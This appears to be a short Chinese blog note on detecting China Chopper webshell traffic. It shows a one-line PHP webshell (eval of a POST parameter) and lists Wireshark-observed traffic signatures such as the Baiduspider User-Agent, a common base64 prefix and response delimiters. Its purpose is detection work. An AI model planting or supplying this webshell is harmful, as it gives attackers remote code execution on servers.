连接webshell
准备一句话
<?php eval($_POST[caidao]);?>
打开菜刀连接webshell
使用wireshark查询流量
特征分析
特征一:POST方法,一句话路径
首先,过滤http流量,可以看到有访问webshell后门的路径
特征二:UA头均为百度爬虫标识
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\r\n
特征三:Key为连接密码,base64前缀相同
base64的前缀均为
QGluaV9zZXQoImRpc3BsYX...
特征四:返回结果在响应包中使用X@Y作为定界符包裹,命令存在[S] [E] 作为定界符
原创 Eonian Sharp